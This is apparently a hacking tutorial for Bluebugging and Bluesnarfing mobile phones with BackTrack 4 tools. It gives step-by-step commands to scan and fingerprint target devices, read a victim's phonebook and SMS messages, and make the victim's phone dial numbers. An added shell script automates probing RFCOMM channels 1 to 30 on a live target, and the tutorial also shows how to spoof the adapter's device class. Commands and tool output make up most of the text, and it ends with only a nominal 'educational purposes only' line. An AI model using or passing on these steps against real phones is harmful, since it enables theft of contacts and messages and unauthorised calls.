Bluebugger (low success rate, so you have to keep on trying)
Bluebugging is a Bluetooth attack that succeeds largely because users are unaware of it. In order of public discovery, Bluetooth attacks first appeared with Bluejacking, followed by Bluesnarfing and then Bluebugging.
Bluebugging is best known for its use against early Nokia phones. Those models shipped with a faulty Bluetooth implementation that has since been fixed by newer firmware (pairing authentication and/or PIN entry) made available to customers.
The newer firmware does not make these devices immune; it raises the bar and slows an attacker down. For the average user, personal security (choosing and protecting a multi-digit PIN, not accepting unexpected pairing requests) and situational awareness make the attack much harder and force anyone attempting Bluebugging to rely on special hardware and a lot of computing power (for example to crack the PIN).
You need: BackTrack 4 (Bluesnarfer and Bluebugger are included in it).
Bluesnarfer and Bluebugger commands
Configure the RFCOMM device nodes. Bluesnarfer expects its node under /dev/bluetooth/rfcomm/, so create it with:
bt ~ # mkdir -p /dev/bluetooth/rfcomm
bt ~ # mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
That was for bluesnarfer; bluebugger uses /dev/rfcomm0 instead, so create that node too:
bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0
(216 is the character-device major number for RFCOMM TTYs.) Then bring the adapter up:
bt ~ # hciconfig hci0 up
The Bluetooth adapter should now be ready. Check it with:
bt ~ # hciconfig hci0
You should see something like this:
hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
To scan for other Bluetooth devices, type:
bt ~ # hcitool -i hci0 scan
This lists the name and address of every discoverable device in range. Devices set to non-discoverable (hidden) will not show up here; you can also use btscanner, whose brute-force mode finds hidden devices by trying addresses directly.
Note the name and MAC of the target and let's move on. First, check that the target is reachable by pinging it at the L2CAP level:
bt ~ # l2ping (target MAC)
Next we need to learn more about the target, in particular which services and RFCOMM channels it exposes, so fingerprint it with sdptool:
bt ~ # sdptool browse --tree --l2cap (target MAC)
Now run bluesnarfer without arguments to see its usage:
bt ~ # bluesnarfer
You should see something like this:
bluesnarfer version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Now run bluesnarfer against the target. The RFCOMM channel (-C) is what matters: start with a channel from the sdptool output and try others if it does not answer:
bluesnarfer [options] -C 7 -b (target MAC)
bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55 (example: read phonebook entries 1 to 100 over channel 7)
Type the following Bluebugger command:
bluebugger -h
Now you should get something like this:
bluebugger 0.1
-----------------------------------------
Usage: bluebugger [OPTIONS] -a (addr) [MODE]
-a (addr) = Bluetooth address of target
Options:
--------
-m (name) = Name to use when connecting (default: '')
-d (device) = Device to use (default: '/dev/rfcomm')
-c (channel) = Channel to use (default: 17)
-n = No device name lookup
-t (timeout) = Timeout in seconds for name lookup (default: 5)
-o (file) = Write output to (file)
Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial (num) = Dial number
ATCMD = Custom Command (e.g. '+GMI')
NOTE: Modes can be combined, e.g. 'info phonebook +GMI'
Now type the following command:
bluebugger [OPTIONS] -c 7 -a (target MAC) [MODE]
bluebugger -m ungli.baba -c 7 -a 00:11:22:33:44:55 dial 0845KIM (example: connect as 'ungli.baba' over channel 7 and make the phone dial the number)
And again you should see some results. If after using bluebugger you get an "operation already in progress" error, reset the adapter:
hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up
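The scan, sdptool and channel-trying steps above, automated as one script. This is an added example written for this page; it is not part of the original tutorial nor of the bluesnarfer or bluebugger projects. The SDP dump embedded in it is constructed to mimic the record format sdptool browse prints (real names, handles and channels will differ), the function names are my own, and it assumes sdptool, bluesnarfer, hciconfig and timeout are on PATH. The sweep does not rely on bluesnarfer's exit status; it saves each channel's output and lets you compare them.

```shell
#!/bin/sh
# Added example for this page (not from the original tutorial or the
# bluesnarfer/bluebugger projects): pull the RFCOMM channels out of an
# "sdptool browse" dump, build an ordered list of channels to try, and
# sweep them with "bluesnarfer -i", logging each attempt.

# CONSTRUCTED sample of sdptool's record format. A real phone's names,
# handles and channel numbers will differ.
SAMPLE_SDP='Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up Networking
Service RecHandle: 0x10000
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: Headset Audio Gateway
Service RecHandle: 0x10001
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7

Service Name: OBEX Object Push
Service RecHandle: 0x10002
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
'

# parse_rfcomm_channels: read an sdptool browse dump on stdin and print
# "<channel><TAB><service name>" for every RFCOMM-based service, in order.
parse_rfcomm_channels() {
    awk '
        /^Service Name:/        { sub(/^Service Name: */, ""); name = $0 }
        /^$/                    { name = "(unnamed)"; in_rfcomm = 0 }
        /"RFCOMM"/              { in_rfcomm = 1; next }
        in_rfcomm && /Channel:/ { print $2 "\t" name; in_rfcomm = 0 }
    '
}

# advertised_channels: channel numbers only, one per line.
advertised_channels() {
    parse_rfcomm_channels | cut -f1
}

# candidate_channels: advertised channels first (most likely to answer), then
# the rest of 1..30 (RFCOMM server channels run 1-30), because the classic
# bluebugging entry points were AT-command channels NOT listed in SDP.
candidate_channels() {
    adv=$(advertised_channels)
    [ -n "$adv" ] && printf '%s\n' "$adv"
    i=1
    while [ "$i" -le 30 ]; do
        case " $(printf '%s ' $adv)" in
            *" $i "*) ;;                 # already listed above
            *) printf '%s\n' "$i" ;;
        esac
        i=$((i + 1))
    done
}

# reset_adapter: the tutorial's fix for "operation already in progress".
reset_adapter() {
    hciconfig hci0 down
    hciconfig hci0 reset
    hciconfig hci0 up
}

# sweep_target <bdaddr> [logdir]: run "bluesnarfer -i" (device info) on each
# candidate channel of a live target, saving every channel's output so you
# can see which one actually spoke AT commands. Needs a working adapter, the
# rfcomm device node from the tutorial and a target in range. The 15 s
# per-channel timeout and the summary are my choices, not the tool's.
sweep_target() {
    target=$1
    logdir=${2:-sweep-$(printf '%s' "$target" | tr ':' '-')}
    mkdir -p "$logdir"
    sdptool browse "$target" | candidate_channels | while read -r ch; do
        echo "trying RFCOMM channel $ch"
        timeout 15 bluesnarfer -i -C "$ch" -b "$target" >"$logdir/ch$ch.log" 2>&1 || true
        # a stuck adapter shows up as "operation already in progress"
        grep -qi 'already in progress' "$logdir/ch$ch.log" && reset_adapter
    done
    echo "channels with the most output (look at these first):"
    wc -l "$logdir"/ch*.log | grep -v ' total$' | sort -rn | head -5
}

# Stand-alone demo on the constructed dump (no hardware needed).
# To sweep a real phone after "hciconfig hci0 up":  sweep_target 00:11:22:33:44:55
printf '%s\n' "$SAMPLE_SDP" | parse_rfcomm_channels
```

Channels that answered are the ones whose log holds more than an error line; feed the best one to bluesnarfer -r / bluebugger -c as in the steps above.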
Basic commands:
lsusb                      shows the type and vendor of your USB Bluetooth dongle
hciconfig hci0 up          activates your Bluetooth adapter
hciconfig -a               shows details of your own adapter(s)
hcitool -i hci0 scan       scans the air for discoverable devices
sdptool browse (bd_addr)   enumerates (fingerprints) the services a device offers
Detecting Bluetooth devices:
hcitool scan
Checking your own adapter's configuration and state:
hciconfig hci0
Every Bluetooth device advertises a so-called device class, a value describing what kind of device it is. To read your adapter's class:
hciconfig hci0 class
To change the class (for example to appear as a different kind of device):
hciconfig hci0 class 0x0000
General syntax for hcitool and hcidump:
hcitool [options] [command] [command parameters]
hcidump [options] [filter]
RFCOMM channels are gold mines: if you pick the right ones you will progress well. There are many RFCOMM channels (1 to 30), so you must keep on trying. I haven't tried it on many phones so I'm not sure of its success rate. Good luck.
For educational purposes only.